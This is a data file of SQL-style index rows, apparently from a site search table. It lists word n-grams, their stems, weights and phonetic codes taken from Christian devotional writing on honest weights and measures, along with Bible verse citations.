(284953, 'may refer', 'mai refer', 0, 1, 1.3, 'M616', 1, '*'),
(284954, 'may refer to', 'mai refer to', 0, 1, 1.4, 'M6163', 1, '*'),
(284955, 'measure or', 'measur or', 0, 1, 1.3333, 'M260', 1, '*'),
(284956, 'measure or value', 'measur or value', 0, 1, 1.5333, 'M2614', 1, '*'),
(284957, 'measures could', 'measur could', 0, 1, 1.4667, 'M26243', 1, '*'),
(284958, 'measures could be', 'measur could be', 0, 1, 1.5667, 'M262431', 1, '*'),
(284959, 'micah', 'micah', 0, 0, 0.3333, 'M200', 1, '*'),
(284960, 'micah 6', 'micah 6', 0, 1, 1.2333, 'M200', 1, '*'),
(284961, 'micah 6 11', 'micah 6 11', 0, 1, 1.3333, 'M200', 1, '*'),
(284962, 'money cheat', 'monei cheat', 0, 1, 1.3667, 'M230', 1, '*'),
(284963, 'money cheat others', 'monei cheat others', 0, 1, 1.6, 'M2362', 1, '*'),
(284964, 'money more', 'monei more', 0, 1, 1.3333, 'M600', 1, '*'),
(284965, 'money more promotion', 'monei more promotion', 0, 1, 1.6667, 'M616535', 1, '*'),
(284966, 'money you', 'monei you', 0, 1, 1.3, 'M000', 1, '*'),
(284967, 'money you move', 'monei you move', 0, 1, 1.4667, 'M100', 1, '*'),
(284968, 'more money', 'more money', 0, 1, 1.3333, 'M650', 1, '*'),
(284969, 'more money cheat', 'more money cheat', 0, 1, 1.5333, 'M6523', 1, '*'),
(284970, 'more money more', 'more money more', 0, 1, 1.5, 'M656', 1, '*'),
(284971, 'more or', 'more or', 0, 1, 1.2333, 'M600', 1, '*'),
(284972, 'more or illegal', 'more or illegal', 0, 1, 1.5, 'M6424', 1, '*'),
(284973, 'more or sell', 'more or sell', 0, 1, 1.4, 'M624', 1, '*'),
(284974, 'more physical', 'more physical', 0, 1, 1.4333, 'M6124', 1, '*'),
(284975, 'more physical advancement', 'more physical advancement', 0, 1, 1.8333, 'M6124315253', 1, '*'),
(284976, 'more promotion', 'more promotion', 0, 1, 1.4667, 'M616535', 1, '*'),
(284977, 'more promotion or', 'more promotion or', 0, 1, 1.5667, 'M6165356', 1, '*'),
(284978, 'more you are', 'more you are', 0, 1, 1.4, 'M600', 1, '*'),
(284979, 'move from', 'move from', 0, 1, 1.3, 'M165', 1, '*'),
(284980, 'move from right', 'move from right', 0, 1, 1.5, 'M165623', 1, '*'),
(284981, 'neutral', 'neutral', 0, 0, 0.4667, 'N364', 1, '*'),
(284982, 'neutral judge', 'neutral judge', 0, 1, 1.4333, 'N364232', 1, '*'),
(284983, 'neutral judge it', 'neutral judge it', 0, 1, 1.5333, 'N3642323', 1, '*'),
(284984, 'of a thing', 'of a thing', 0, 1, 1.3333, 'O1352', 1, '*'),
(284985, 'of just weight', 'of just weight', 0, 1, 1.4667, 'O12323', 1, '*'),
(284986, 'of things', 'of things', 0, 1, 1.3, 'O1352', 1, '*'),
(284987, 'of things used', 'of things used', 0, 1, 1.4667, 'O13523', 1, '*'),
(284988, 'of weights or', 'of weights or', 0, 1, 1.4333, 'O12326', 1, '*'),
(284989, 'one class', 'on class', 0, 1, 1.3, 'O5242', 1, '*'),
(284990, 'one class to', 'on class to', 0, 1, 1.4, 'O52423', 1, '*'),
(284991, 'one to', 'on to', 0, 1, 1.2, 'O530', 1, '*'),
(284992, 'one to know', 'on to know', 0, 1, 1.3667, 'O5325', 1, '*'),
(284993, 'or bent', 'or bent', 0, 1, 1.2333, 'O6153', 1, '*'),
(284994, 'or bent the', 'or bent the', 0, 1, 1.3667, 'O6153', 1, '*'),
(284995, 'or correct', 'or correct', 0, 1, 1.3333, 'O62623', 1, '*'),
(284996, 'or correct values', 'or correct values', 0, 1, 1.5667, 'O62623142', 1, '*'),
(284997, 'or illegal', 'or illegal', 0, 1, 1.3333, 'O6424', 1, '*'),
(284998, 'or illegal gain', 'or illegal gain', 0, 1, 1.5, 'O642425', 1, '*'),
(284999, 'or implied', 'or implied', 0, 1, 1.3333, 'O65143', 1, '*'),
(285000, 'or implied literal', 'or implied literal', 0, 1, 1.6, 'O651434364', 1, '*'),
(285001, 'or measures', 'or measures', 0, 1, 1.3667, 'O65262', 1, '*'),
(285002, 'or measures could', 'or measures could', 0, 1, 1.5667, 'O6526243', 1, '*'),
(285003, 'or more', 'or more', 0, 1, 1.2333, 'O656', 2, '*'),
(285004, 'or more physical', 'or more physical', 0, 1, 1.5333, 'O656124', 1, '*'),
(285005, 'or remove', 'or remove', 0, 1, 1.3, 'O651', 1, '*'),
(285006, 'or remove things', 'or remove things', 0, 1, 1.5333, 'O651352', 1, '*'),
(285007, 'or sell', 'or sell', 0, 1, 1.2333, 'O624', 1, '*'),
(285008, 'or sell less', 'or sell less', 0, 1, 1.4, 'O6242', 1, '*'),
(285009, 'or value', 'or value', 0, 1, 1.2667, 'O614', 1, '*'),
(285010, 'or value of', 'or value of', 0, 1, 1.3667, 'O6141', 1, '*'),
(285011, 'other etc', 'other etc', 0, 1, 1.3, 'O3632', 1, '*'),
(285012, 'other etc this', 'other etc this', 0, 1, 1.4667, 'O363232', 1, '*'),
(285013, 'others tell', 'other tell', 0, 1, 1.3667, 'O36234', 1, '*'),
(285014, 'others tell lies', 'other tell lies', 0, 1, 1.5333, 'O362342', 1, '*'),
(285015, 'out what is', 'out what is', 0, 1, 1.3667, 'O320', 1, '*'),
(285016, 'pay less', 'pai less', 0, 1, 1.2667, 'P420', 1, '*'),
(285017, 'pay less and', 'pai less and', 0, 1, 1.4, 'P4253', 1, '*'),
(285018, 'people want', 'peopl want', 0, 1, 1.3667, 'P453', 1, '*'),
(285019, 'people want to', 'peopl want to', 0, 1, 1.4667, 'P453', 1, '*'),
(285020, 'physical advancement', 'physic advancement', 0, 1, 1.6667, 'P24315253', 1, '*'),
(285021, 'physical advancement in', 'physic advancement in', 0, 1, 1.7667, 'P243152535', 1, '*'),
(285022, 'physical life but', 'physic life but', 0, 1, 1.5667, 'P2413', 1, '*'),
(285023, 'please the', 'pleas the', 0, 1, 1.3333, 'P423', 1, '*'),
(285024, 'please the flesh', 'pleas the flesh', 0, 1, 1.5333, 'P423142', 1, '*'),
(285025, 'power can\'t', 'power can', 0, 1, 1.3667, 'P6253', 1, '*'),
(285026, 'power can\'t reach', 'power can reach', 0, 1, 1.5667, 'P625362', 1, '*'),
(285027, 'presence to', 'presenc to', 0, 1, 1.3667, 'P62523', 1, '*'),
(285028, 'presence to where', 'presenc to where', 0, 1, 1.5667, 'P625236', 1, '*'),
(285029, 'pretend', 'pretend', 0, 0, 0.4667, 'P6353', 1, '*'),
(285030, 'pretend add', 'pretend add', 0, 1, 1.3667, 'P6353', 1, '*'),
(285031, 'pretend add or', 'pretend add or', 0, 1, 1.4667, 'P63536', 1, '*'),
(285032, 'promotion or more', 'promot or more', 0, 1, 1.5667, 'P6535656', 1, '*'),
(285033, 'prov', 'prov', 0, 0, 0.2667, 'P610', 1, '*'),
(285034, 'prov 16', 'prov 16', 0, 1, 1.2333, 'P610', 1, '*'),
(285035, 'prov 16 11', 'prov 16 11', 0, 1, 1.3333, 'P610', 1, '*'),
(285036, 'reach you', 'reach you', 0, 1, 1.3, 'R200', 1, '*'),
(285037, 'reach you the', 'reach you the', 0, 1, 1.4333, 'R230', 1, '*'),
(285038, 'refer to being', 'refer to being', 0, 1, 1.4667, 'R163152', 1, '*'),
(285039, 'remove', 'remov', 0, 0, 0.4, 'R510', 1, '*'),
(285040, 'remove things', 'remov things', 0, 1, 1.4333, 'R51352', 1, '*'),
(285041, 'remove things for', 'remov things for', 0, 1, 1.5667, 'R5135216', 1, '*'),
(285042, 'results from', 'result from', 0, 1, 1.4, 'R2432165', 1, '*'),
(285043, 'results from one', 'result from one', 0, 1, 1.5333, 'R2432165', 1, '*'),
(285044, 'richly', 'richli', 0, 0, 0.4, 'R240', 1, '*'),
(285045, 'richly blessed', 'richli blessed', 0, 1, 1.4667, 'R241423', 1, '*'),
(285046, 'richly blessed as', 'richli blessed as', 0, 1, 1.5667, 'R2414232', 1, '*'),
(285047, 'right standard', 'right standard', 0, 1, 1.4667, 'R23235363', 1, '*'),
(285048, 'right standard or', 'right standard or', 0, 1, 1.5667, 'R232353636', 1, '*'),
(285049, 'right telling', 'right telling', 0, 1, 1.4333, 'R23452', 1, '*'),
(285050, 'right telling the', 'right telling the', 0, 1, 1.5667, 'R234523', 1, '*'),
(285051, 'right thing', 'right thing', 0, 1, 1.3667, 'R2352', 1, '*'),
(285052, 'right thing to', 'right thing to', 0, 1, 1.4667, 'R23523', 1, '*'),
(285053, 'rule containers', 'rule containers', 0, 1, 1.5, 'R4253562', 1, '*'),
(285054, 'rule containers kegs', 'rule containers kegs', 0, 1, 1.6667, 'R4253562', 1, '*'),
(285055, 'scales tape', 'scale tape', 0, 1, 1.3667, 'S4231', 1, '*'),
(285056, 'scales tape rule', 'scale tape rule', 0, 1, 1.5333, 'S423164', 1, '*'),
(285057, 'sell', 'sell', 0, 0, 0.2667, 'S400', 2, '*'),
(285058, 'sell less', 'sell less', 0, 1, 1.3, 'S420', 1, '*'),
(285059, 'sell less and', 'sell less and', 0, 1, 1.4333, 'S4253', 1, '*'),
(285060, 'series', 'seri', 0, 0, 0.4, 'S620', 1, '*'),
(285061, 'series in', 'seri in', 0, 1, 1.3, 'S625', 1, '*'),
(285062, 'series in the', 'seri in the', 0, 1, 1.4333, 'S6253', 1, '*'),
(285063, 'shifting', 'shift', 0, 0, 0.5333, 'S1352', 1, '*'),
(285064, 'shifting from', 'shift from', 0, 1, 1.4333, 'S1352165', 1, '*'),
(285065, 'shifting from god\'s', 'shift from god', 0, 1, 1.6333, 'S1352165232', 1, '*'),
(285066, 'significance', 'signific', 0, 0, 0.8, 'S51252', 1, '*'),
(285067, 'significance of', 'signific of', 0, 1, 1.5, 'S512521', 1, '*'),
(285068, 'significance of weights', 'signific of weights', 0, 1, 1.7667, 'S512521232', 1, '*'),
(285069, 'simple spells', 'simpl spells', 0, 1, 1.4333, 'S5142142', 1, '*'),
(285070, 'simple spells out', 'simpl spells out', 0, 1, 1.5667, 'S51421423', 1, '*'),
(285071, 'so is he', 'so is he', 0, 1, 1.2667, 'S000', 1, '*'),
(285072, 'spells', 'spell', 0, 0, 0.4, 'S142', 1, '*'),
(285073, 'spells out', 'spell out', 0, 1, 1.3333, 'S1423', 1, '*'),
(285074, 'spells out what', 'spell out what', 0, 1, 1.5, 'S1423', 1, '*'),
(285075, 'standard or', 'standard or', 0, 1, 1.3667, 'S353636', 1, '*'),
(285076, 'standard or correct', 'standard or correct', 0, 1, 1.6333, 'S3536362623', 1, '*'),
(285077, 'straight forward', 'straight forward', 0, 1, 1.5333, 'S3623163', 1, '*'),
(285078, 'straight forward right', 'straight forward right', 0, 1, 1.7333, 'S3623163623', 1, '*'),
(285079, 'straight or', 'straight or', 0, 1, 1.3667, 'S36236', 1, '*'),
(285080, 'straight or bent', 'straight or bent', 0, 1, 1.5333, 'S36236153', 1, '*'),
(285081, 'such as scales', 'such as scales', 0, 1, 1.4667, 'S420', 1, '*'),
(285082, 'take more', 'take more', 0, 1, 1.3, 'T256', 1, '*'),
(285083, 'take more or', 'take more or', 0, 1, 1.4, 'T256', 1, '*'),
(285084, 'tape', 'tape', 0, 0, 0.2667, 'T100', 1, '*'),
(285085, 'tape rule', 'tape rule', 0, 1, 1.3, 'T164', 1, '*'),
(285086, 'tape rule containers', 'tape rule containers', 0, 1, 1.6667, 'T164253562', 1, '*'),
(285087, 'tell lies', 'tell lies', 0, 1, 1.3, 'T420', 1, '*'),
(285088, 'tell lies pretend', 'tell lies pretend', 0, 1, 1.5667, 'T4216353', 1, '*'),
(285089, 'telling the', 'tell the', 0, 1, 1.3667, 'T4523', 1, '*'),
(285090, 'telling the truth', 'tell the truth', 0, 1, 1.5667, 'T452363', 1, '*'),
(285091, 'terms of', 'term of', 0, 1, 1.2667, 'T6521', 1, '*'),
(285092, 'terms of things', 'term of things', 0, 1, 1.5, 'T6521352', 1, '*'),
(285093, 'texts micah', 'text micah', 0, 1, 1.3667, 'T23252', 1, '*'),
(285094, 'texts micah 6', 'text micah 6', 0, 1, 1.4333, 'T23252', 1, '*'),
(285095, 'the accurate', 'the accurate', 0, 1, 1.4, 'T263', 1, '*'),
(285096, 'the accurate measure', 'the accurate measure', 0, 1, 1.6667, 'T263526', 1, '*'),
(285097, 'the conscience', 'the conscience', 0, 1, 1.4667, 'T25252', 1, '*'),
(285098, 'the conscience of', 'the conscience of', 0, 1, 1.5667, 'T252521', 1, '*'),
(285099, 'the flesh the', 'the flesh the', 0, 1, 1.4333, 'T1423', 1, '*'),
(285100, 'the level the', 'the level the', 0, 1, 1.4333, 'T4143', 1, '*'),
(285101, 'the money you', 'the money you', 0, 1, 1.4333, 'T500', 1, '*'),
(285102, 'the other etc', 'the other etc', 0, 1, 1.4333, 'T632', 1, '*'),
(285103, 'the true worth', 'the true worth', 0, 1, 1.4667, 'T630', 1, '*'),
(285104, 'the truth having', 'the truth having', 0, 1, 1.5333, 'T63152', 1, '*'),
(285105, 'these may', 'these may', 0, 1, 1.3, 'T250', 1, '*'),
(285106, 'these may bring', 'these may bring', 0, 1, 1.5, 'T251652', 1, '*'),
(285107, 'thing such', 'thing such', 0, 1, 1.3333, 'T520', 1, '*'),
(285108, 'thing such as', 'thing such as', 0, 1, 1.4333, 'T520', 1, '*'),
(285109, 'thing to please', 'thing to please', 0, 1, 1.5, 'T523142', 1, '*'),
(285110, 'things for', 'thing for', 0, 1, 1.3333, 'T5216', 1, '*'),
(285111, 'things for more', 'thing for more', 0, 1, 1.5, 'T521656', 1, '*'),
(285112, 'things used', 'thing used', 0, 1, 1.3667, 'T523', 1, '*'),
(285113, 'things used to', 'thing used to', 0, 1, 1.4667, 'T523', 1, '*'),
(285114, 'this enables', 'thi enables', 0, 1, 1.4, 'T25142', 1, '*'),
(285115, 'this enables one', 'thi enables one', 0, 1, 1.5333, 'T251425', 1, '*'),
(285116, 'this series', 'thi series', 0, 1, 1.3667, 'T262', 1, '*'),
(285117, 'this series in', 'thi series in', 0, 1, 1.4667, 'T2625', 1, '*'),
(285118, 'to being', 'to being', 0, 1, 1.2667, 'T152', 1, '*'),
(285119, 'to being right', 'to being right', 0, 1, 1.4667, 'T152623', 1, '*'),
(285120, 'to pay', 'to pay', 0, 1, 1.2, 'T100', 2, '*'),
(285121, 'to pay less', 'to pay less', 0, 1, 1.3667, 'T142', 1, '*'),
(285122, 'to please the', 'to please the', 0, 1, 1.4333, 'T1423', 1, '*'),
(285123, 'to the conscience', 'to the conscience', 0, 1, 1.5667, 'T25252', 1, '*'),
(285124, 'to the other', 'to the other', 0, 1, 1.4, 'T600', 1, '*'),
(285125, 'to where his', 'to where his', 0, 1, 1.4, 'T620', 1, '*'),
(285126, 'true worth', 'true worth', 0, 1, 1.3333, 'T630', 1, '*'),
(285127, 'true worth and', 'true worth and', 0, 1, 1.4667, 'T6353', 1, '*'),
(285128, 'truth having', 'truth having', 0, 1, 1.4, 'T63152', 1, '*'),
(285129, 'truth having integrity', 'truth having integrity', 0, 1, 1.7333, 'T6315253263', 1, '*'),
(285130, 'used to get', 'us to get', 0, 1, 1.3667, 'U2323', 1, '*'),
(285131, 'value a', 'valu a', 0, 1, 1.2333, 'V400', 1, '*'),
(285132, 'value a weight', 'valu a weight', 0, 1, 1.4667, 'V423', 1, '*'),
(285133, 'value of', 'valu of', 0, 1, 1.2667, 'V410', 1, '*'),
(285134, 'value of a', 'valu of a', 0, 1, 1.3333, 'V410', 1, '*'),
(285135, 'values many', 'valu many', 0, 1, 1.3667, 'V425', 1, '*'),
(285136, 'values many people', 'valu many people', 0, 1, 1.6, 'V42514', 1, '*'),
(285137, 'voice and power', 'voic and power', 0, 1, 1.5, 'V25316', 1, '*'),
(285138, 'want to pay', 'want to pay', 0, 1, 1.3667, 'W531', 1, '*'),
(285139, 'we go into', 'we go into', 0, 1, 1.3333, 'W253', 1, '*'),
(285140, 'weight is', 'weight is', 0, 1, 1.3, 'W232', 1, '*'),
(285141, 'weight is a', 'weight is a', 0, 1, 1.3667, 'W232', 1, '*'),
(285142, 'weight is highly', 'weight is highly', 0, 1, 1.5333, 'W2324', 1, '*'),
(285143, 'weight may', 'weight may', 0, 1, 1.3333, 'W235', 1, '*'),
(285144, 'weight may refer', 'weight may refer', 0, 1, 1.5333, 'W235616', 1, '*'),
(285145, 'weight so', 'weight so', 0, 1, 1.3, 'W232', 1, '*'),
(285146, 'weight so is', 'weight so is', 0, 1, 1.4, 'W232', 1, '*'),
(285147, 'weights could', 'weight could', 0, 1, 1.4333, 'W23243', 1, '*'),
(285148, 'weights could be', 'weight could be', 0, 1, 1.5333, 'W232431', 1, '*'),
(285149, 'weights or', 'weight or', 0, 1, 1.3333, 'W2326', 1, '*'),
(285150, 'weights or measures', 'weight or measures', 0, 1, 1.6333, 'W23265262', 1, '*'),
(285151, 'what is there', 'what is there', 0, 1, 1.4333, 'W3236', 1, '*'),
(285152, 'where his', 'where his', 0, 1, 1.3, 'W620', 1, '*'),
(285153, 'where his life', 'where his life', 0, 1, 1.4667, 'W6241', 1, '*'),
(285154, 'with the just', 'with the just', 0, 1, 1.4333, 'W323', 1, '*'),
(285155, 'witness all', 'wit all', 0, 1, 1.3667, 'W3524', 1, '*'),
(285156, 'witness all these', 'wit all these', 0, 1, 1.5667, 'W352432', 1, '*'),
(285157, 'worth and', 'worth and', 0, 1, 1.3, 'W6353', 1, '*'),
(285158, 'worth and value', 'worth and value', 0, 1, 1.5, 'W635314', 1, '*'),
(285159, 'you are shifting', 'you are shifting', 0, 1, 1.5333, 'Y621352', 1, '*'),
(285160, 'you be richly', 'you be richly', 0, 1, 1.4333, 'Y1624', 1, '*'),
(285161, 'you move from', 'you move from', 0, 1, 1.4333, 'Y5165', 1, '*'),
(285162, 'you the doctrine', 'you the doctrine', 0, 1, 1.5333, 'Y32365', 1, '*'),
(285247, '1 1cor.6', '1 1cor.6', 0, 1, 1.2667, 'C600', 1, '*'),
(285248, '1 1cor.6 2', '1 1cor.6 2', 0, 1, 1.3333, 'C600', 1, '*'),
(285249, '1 26-27', '1 26-27', 0, 1, 1.2333, '', 1, '*'),
(285250, '1-22 “eternal', '1-22 “eternal', 0, 1, 1.4333, '“3654', 1, '*'),
(285251, '1-22 “eternal security”', '1-22 “eternal security”', 0, 1, 1.7667, '“3654263', 1, '*'),
(285252, '11 26', '11 26', 0, 1, 1.1667, '', 1, '*'),
(285253, '11 26 when', '11 26 when', 0, 1, 1.3333, 'W500', 1, '*'),
(285254, '11 one', '11 one', 0, 1, 1.2, 'O500', 1, '*'),
(285255, '11 one who', '11 one who', 0, 1, 1.3333, 'O500', 1, '*'),
(285256, '12 you', '12 you', 0, 1, 1.2, 'Y000', 1, '*'),
(285257, '12 you have', '12 you have', 0, 1, 1.3667, 'Y100', 1, '*'),
(285258, '13 5-8', '13 5-8', 0, 1, 1.2, '', 1, '*'),
(285259, '13 5-8 5', '13 5-8 5', 0, 1, 1.2667, '', 1, '*'),
(285260, '13 heb', '13 heb', 0, 1, 1.2, 'H100', 1, '*'),
(285261, '13 heb 3', '13 heb 3', 0, 1, 1.2667, 'H100', 1, '*'),
(285262, '14 when', '14 when', 0, 1, 1.2333, 'W500', 1, '*'),
(285263, '14 when you', '14 when you', 0, 1, 1.3667, 'W500', 1, '*'),
(285264, '15 isa.8', '15 isa.8', 0, 1, 1.2667, 'I200', 1, '*'),
(285265, '15 isa.8 18', '15 isa.8 18', 0, 1, 1.3667, 'I200', 1, '*'),
(285266, '15-16 phil.3', '15-16 phil.3', 0, 1, 1.4, 'P400', 1, '*'),
(285267, '15-16 phil.3 7-10', '15-16 phil.3 7-10', 0, 1, 1.5667, 'P400', 1, '*'),
(285268, '16-21 eph', '16-21 eph', 0, 1, 1.3, 'E100', 1, '*'),
(285269, '16-21 eph 2', '16-21 eph 2', 0, 1, 1.3667, 'E100', 1, '*'),
(285270, '17 gradual', '17 gradual', 0, 1, 1.3333, 'G634', 1, '*'),
(285271, '17 gradual salvation', '17 gradual salvation', 0, 1, 1.6667, 'G63424135', 1, '*'),
(285272, '17 john', '17 john', 0, 1, 1.2333, 'J500', 1, '*'),
(285273, '17 john 3', '17 john 3', 0, 1, 1.3, 'J500', 1, '*'),
(285274, '18 acts', '18 acts', 0, 1, 1.2333, 'A232', 1, '*'),
(285275, '18 acts 21', '18 acts 21', 0, 1, 1.3333, 'A232', 1, '*'),
(285276, '18-19 26', '18-19 26', 0, 1, 1.2667, '', 1, '*'),
(285277, '18-19 26 lk.18', '18-19 26 lk.18', 0, 1, 1.4667, 'L200', 1, '*'),
(285278, '1cor.6', '1cor.6', 0, 0, 0.4, 'C600', 1, '*'),
(285279, '1cor.6 2', '1cor.6 2', 0, 1, 1.2667, 'C600', 1, '*'),
(285280, '1cor.6 2 2cor.8', '1cor.6 2 2cor.8', 0, 1, 1.5, 'C626', 1, '*'),
(285281, '1john', '1john', 0, 0, 0.3333, 'J500', 1, '*'),
(285282, '1john 2', '1john 2', 0, 1, 1.2333, 'J500', 1, '*'),
(285283, '1john 2 15-16', '1john 2 15-16', 0, 1, 1.4333, 'J500', 1, '*'),
(285284, '2 1-22', '2 1-22', 0, 1, 1.2, '', 1, '*'),
(285285, '2 1-22 “eternal', '2 1-22 “eternal', 0, 1, 1.5, '“3654', 1, '*'),
(285286, '2 15-16', '2 15-16', 0, 1, 1.2333, '', 1, '*'),
(285287, '2 15-16 phil.3', '2 15-16 phil.3', 0, 1, 1.4667, 'P400', 1, '*'),
(285288, '2 2cor.8', '2 2cor.8', 0, 1, 1.2667, 'C600', 1, '*'),
(285289, '2 2cor.8 5', '2 2cor.8 5', 0, 1, 1.3333, 'C600', 1, '*'),
(285290, '2 corinthians 13', '2 corinthians 13', 0, 1, 1.5333, 'C65352', 1, '*'),
(285291, '20 lk.9', '20 lk.9', 0, 1, 1.2333, 'L200', 1, '*'),
(285292, '20 lk.9 59-62', '20 lk.9 59-62', 0, 1, 1.4333, 'L200', 1, '*'),
(285293, '21 9', '21 9', 0, 1, 1.1333, '', 1, '*'),
(285294, '21 9 heb.11', '21 9 heb.11', 0, 1, 1.3667, 'H100', 1, '*'),
(285295, '21-24 one', '21-24 one', 0, 1, 1.3, 'O500', 1, '*'),
(285296, '21-24 one who', '21-24 one who', 0, 1, 1.4333, 'O500', 1, '*'),
(285297, '24 15', '24 15', 0, 1, 1.1667, '', 1, '*'),
(285298, '24 15 isa.8', '24 15 isa.8', 0, 1, 1.3667, 'I200', 1, '*'),
(285299, '24-26', '24-26', 0, 0, 0.5, '', 1, '*'),
(285300, '24-26 one', '24-26 one', 0, 1, 1.3, 'O500', 1, '*'),
(285301, '24-26 one who', '24-26 one who', 0, 1, 1.4333, 'O500', 1, '*'),
(285302, '26 lk.18', '26 lk.18', 0, 1, 1.2667, 'L200', 1, '*'),
(285303, '26 lk.18 20', '26 lk.18 20', 0, 1, 1.3667, 'L200', 1, '*'),
(285304, '26 when', '26 when', 0, 1, 1.2333, 'W500', 1, '*'),
(285305, '26 when their', '26 when their', 0, 1, 1.4333, 'W536', 1, '*'),
(285306, '2cor', '2cor', 0, 0, 0.2667, 'C600', 1, '*'),
(285307, '2cor 5', '2cor 5', 0, 1, 1.2, 'C600', 1, '*'),
(285308, '2cor 5 17', '2cor 5 17', 0, 1, 1.3, 'C600', 1, '*'),
(285309, '2cor.8', '2cor.8', 0, 0, 0.4, 'C600', 1, '*'),
(285310, '2cor.8 5', '2cor.8 5', 0, 1, 1.2667, 'C600', 1, '*'),
(285311, '2cor.8 5 lk.5', '2cor.8 5 lk.5', 0, 1, 1.4333, 'C642', 1, '*'),
(285312, '3 1', '3 1', 0, 1, 1.1, '', 1, '*'),
(285313, '3 1 1cor.6', '3 1 1cor.6', 0, 1, 1.3333, 'C600', 1, '*'),
(285314, '3 6', '3 6', 0, 1, 1.1, '', 1, '*'),
(285315, '3 6 14', '3 6 14', 0, 1, 1.2, '', 1, '*'),
(285316, '3 8', '3 8', 0, 1, 1.1, '', 1, '*'),
(285317, '3 8 2cor', '3 8 2cor', 0, 1, 1.2667, 'C600', 1, '*'),
(285318, '3 8-9', '3 8-9', 0, 1, 1.1667, '', 1, '*'),
(285319, '3 8-9 one', '3 8-9 one', 0, 1, 1.3, 'O500', 1, '*'),
(285320, '32 the', '32 the', 0, 1, 1.2, 'T000', 1, '*'),
(285321, '32 the christian', '32 the christian', 0, 1, 1.5333, 'T26235', 1, '*'),
(285322, '35 lk.14', '35 lk.14', 0, 1, 1.2667, 'L200', 1, '*'),
(285323, '35 lk.14 18-19', '35 lk.14 18-19', 0, 1, 1.4667, 'L200', 1, '*'),
(285324, '5 16-21', '5 16-21', 0, 1, 1.2333, '', 1, '*'),
(285325, '5 16-21 eph', '5 16-21 eph', 0, 1, 1.3667, 'E100', 1, '*'),
(285326, '5 17 gradual', '5 17 gradual', 0, 1, 1.4, 'G634', 1, '*'),
(285327, '5 17 john', '5 17 john', 0, 1, 1.3, 'J500', 1, '*'),
(285328, '5 examine', '5 examine', 0, 1, 1.3, 'E250', 1, '*'),
(285329, '5 examine yourselves', '5 examine yourselves', 0, 1, 1.6667, 'E2562412', 1, '*'),
(285330, '5 lk.5', '5 lk.5', 0, 1, 1.2, 'L200', 1, '*'),
(285331, '5 lk.5 11', '5 lk.5 11', 0, 1, 1.3, 'L200', 1, '*'),
(285332, '5-8 5', '5-8 5', 0, 1, 1.1667, '', 1, '*'),
(285333, '5-8 5 examine', '5-8 5 examine', 0, 1, 1.4333, 'E250', 1, '*'),
(285334, '59-62', '59-62', 0, 0, 0.5, '', 1, '*'),
(285335, '59-62 one', '59-62 one', 0, 1, 1.3, 'O500', 1, '*'),
(285336, '59-62 one who', '59-62 one who', 0, 1, 1.4333, 'O500', 1, '*'),
(285337, '6 14', '6 14', 0, 1, 1.1333, '', 1, '*'),
(285338, '6 14 when', '6 14 when', 0, 1, 1.3, 'W500', 1, '*'),
(285339, '6 but', '6 but', 0, 1, 1.1667, 'B300', 1, '*'),
(285340, '6 but i', '6 but i', 0, 1, 1.2333, 'B300', 1, '*'),
(285341, '7 now', '7 now', 0, 1, 1.1667, 'N000', 1, '*'),
(285342, '7 now i', '7 now i', 0, 1, 1.2333, 'N000', 1, '*'),
(285343, '7-10', '7-10', 0, 0, 0.4, '', 1, '*'),
(285344, '7-10 col', '7-10 col', 0, 1, 1.2667, 'C400', 1, '*'),
(285345, '7-10 col 3', '7-10 col 3', 0, 1, 1.3333, 'C400', 1, '*'),
(285346, '8 2cor', '8 2cor', 0, 1, 1.2, 'C600', 1, '*'),
(285347, '8 2cor 5', '8 2cor 5', 0, 1, 1.2667, 'C600', 1, '*'),
(285348, '8 for', '8 for', 0, 1, 1.1667, 'F600', 1, '*'),
(285349, '8 for we', '8 for we', 0, 1, 1.2667, 'F600', 1, '*'),
(285350, '8 in', '8 in', 0, 1, 1.1333, 'I500', 1, '*'),
(285351, '8 in our', '8 in our', 0, 1, 1.2667, 'I560', 1, '*'),
(285352, '8-9 one', '8-9 one', 0, 1, 1.2333, 'O500', 1, '*'),
(285353, '8-9 one who', '8-9 one who', 0, 1, 1.3667, 'O500', 1, '*'),
(285354, '9 heb.11', '9 heb.11', 0, 1, 1.2667, 'H100', 1, '*'),
(285355, '9 heb.11 24-26', '9 heb.11 24-26', 0, 1, 1.4667, 'H100', 1, '*'),
(285356, '9-10 john', '9-10 john', 0, 1, 1.3, 'J500', 1, '*'),
(285357, '9-10 john 3', '9-10 john 3', 0, 1, 1.3667, 'J500', 1, '*'),
(285358, 'a christian one', 'a christian one', 0, 1, 1.5, 'A26235', 1, '*'),
(285359, 'a wrong doctrine', 'a wrong doctrine', 0, 1, 1.5333, 'A65232365', 1, '*'),
(285360, 'above the world', 'abov the world', 0, 1, 1.5, 'A13643', 1, '*'),
(285361, 'accepted jesus', 'accept jesus', 0, 1, 1.4667, 'A2132', 1, '*'),
(285362, 'accepted jesus as', 'accept jesus as', 0, 1, 1.5667, 'A2132', 1, '*'),
(285363, 'acts 11', 'act 11', 0, 1, 1.2333, 'A232', 1, '*'),
(285364, 'acts 11 26', 'act 11 26', 0, 1, 1.3333, 'A232', 1, '*'),
(285365, 'acts 21', 'act 21', 0, 1, 1.2333, 'A232', 1, '*'),
(285366, 'acts 21 9', 'act 21 9', 0, 1, 1.3, 'A232', 1, '*'),
(285367, 'against the truth', 'against the truth', 0, 1, 1.5667, 'A252363', 1, '*'),
(285368, 'all for', 'all for', 0, 1, 1.2333, 'A416', 1, '*'),
(285369, 'all for your', 'all for your', 0, 1, 1.4, 'A416', 1, '*'),
(285370, 'all one', 'all one', 0, 1, 1.2333, 'A450', 1, '*'),
(285371, 'all one who', 'all one who', 0, 1, 1.3667, 'A450', 1, '*'),
(285372, 'all things matt.10', 'all things matt.10', 0, 1, 1.6, 'A435253', 1, '*'),
(285373, 'and its', 'and its', 0, 1, 1.2333, 'A532', 1, '*'),
(285374, 'and its glory', 'and its glory', 0, 1, 1.4333, 'A53246', 1, '*'),
(285375, 'and manifestations', 'and manifestations', 0, 1, 1.6, 'A53512352', 1, '*'),
(285376, 'and manifestations were', 'and manifestations were', 0, 1, 1.7667, 'A535123526', 1, '*'),
(285377, 'and saviour matt.7', 'and saviour matt.7', 0, 1, 1.6, 'A5321653', 1, '*'),
(285378, 'and still', 'and still', 0, 1, 1.3, 'A53234', 1, '*'),
(285379, 'and still go', 'and still go', 0, 1, 1.4, 'A532342', 1, '*'),
(285380, 'and trembling', 'and trembling', 0, 1, 1.4333, 'A53651452', 1, '*'),
(285381, 'and trembling getting', 'and trembling getting', 0, 1, 1.7, 'A53651452352', 1, '*'),
